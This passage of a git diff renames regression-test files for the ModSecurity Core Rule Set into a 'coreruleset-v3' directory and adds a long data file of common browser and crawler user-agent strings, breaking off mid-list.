b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/base_positive_rules.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/base_positive_rules.py rename to src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/base_positive_rules.py diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest-light.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest-light.yaml.skeleton similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest-light.yaml.skeleton rename to src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest-light.yaml.skeleton diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest.yaml.skeleton similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest.yaml.skeleton rename to src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest.yaml.skeleton diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/data/popularUAs.data b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/data/popularUAs.data new file mode 100644 index 000000000..4675a26b2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/data/popularUAs.data @@ -0,0 +1,586 @@ +AdsBot-Google ( http://www.google.com/adsbot.html) +Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) +Baiduspider ( http://www.baidu.com/search/spider.htm) +BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103 +BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0) +BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0 +BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100 +BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105 +BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 +BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0 +BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 +Bloglines/3.1 (http://www.bloglines.com) +CSSCheck/1.2.2 +DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +DoCoMo/2.0 SH901iC(c100;TB;W24H12) +Download Demon/3.5.0.11 +ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19) +ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33) +ELinks/0.12~pre5-4 +ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41) +EmailWolf 1.00 +FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler) +FeedFetcher-Google; ( http://www.google.com/feedfetcher.html) +Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php) +Googlebot-Image/1.0 +Googlebot-News +Googlebot-Video/1.0 +Googlebot/2.1 ( http://www.googlebot.com/bot.html) +Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua) +Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) +HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +HTMLParser/1.6 +Java/1.6.0_13 +Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 +Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode) +LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 +LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84) +Links (2.1pre15; Linux 2.4.26 i686; 158x61) +Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) +Links/0.9.1 (Linux 2.4.24; i386;) +Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12 +Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d +MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0 +MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0 +MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0 +MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 +Mediapartners-Google +Microsoft URL Control - 6.00.8862 +Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) +Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 +Mozilla/2.0 (compatible; Ask Jeeves/Teoma) +Mozilla/2.02E (Win95; U) +Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) +Mozilla/3.01Gold (Win95; I) +Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 +Mozilla/4.0 (PSP (PlayStation Portable); 2.00) +Mozilla/4.0 (compatible; Dillo 3.0) +Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) +Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800) +Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1) +Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) +Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 ) +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) +Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C) +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) +Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US] +Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30) +Mozilla/4.8 [en] (Windows NT 5.1; U) +Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u) +Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.1.0.2342 Mobile Safari/537.10+ +Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a +Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1 +Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) +Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3 +Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355 +Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 +Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 +Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 +Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 +Mozilla/5.0 (PLAYSTATION 3; 1.10) +Mozilla/5.0 (PLAYSTATION 3; 2.00) +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) 